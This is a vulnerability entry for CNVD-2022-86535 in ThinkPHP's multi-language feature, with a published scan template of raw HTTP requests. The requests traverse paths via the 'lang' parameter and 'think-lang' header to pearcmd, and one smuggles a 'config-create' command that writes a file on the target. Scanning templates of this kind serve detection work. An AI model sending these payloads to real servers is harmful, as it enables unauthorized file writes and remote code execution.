漏洞描述
ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
CNVD-2022-86535: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
PoC代码[已公开]
id: CNVD-2022-86535
info:
name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
author: arliya,ritikchaddha
severity: high
description: |
ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
reference:
- https://cn-sec.com/archives/1465289.html
- https://blog.csdn.net/qq_60614981/article/details/128724640
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
metadata:
verified: true
max-request: 3
tags: cnvd,cnvd2022,thinkphp,rce
http:
- raw:
- |
GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
think-lang: ../../../../../usr/local/php/pearcmd
- |
GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: set_cookie
words:
- "think_lang=..%2F..%2F..%2F..%2F"
- type: word
part: body_3
words:
- "CONFIGURATION"
- "Successfully created"
condition: and
# digest: 490a00463044022061684228a015a435251865c8ad4e5a566ab6f4de613255229317ccb132f2813d022026844e47c56ecbe47b5e9b0901afa3a703a75c3f3911c3402142366ee61dc325:922c64590222798bb761d5b6d8e72950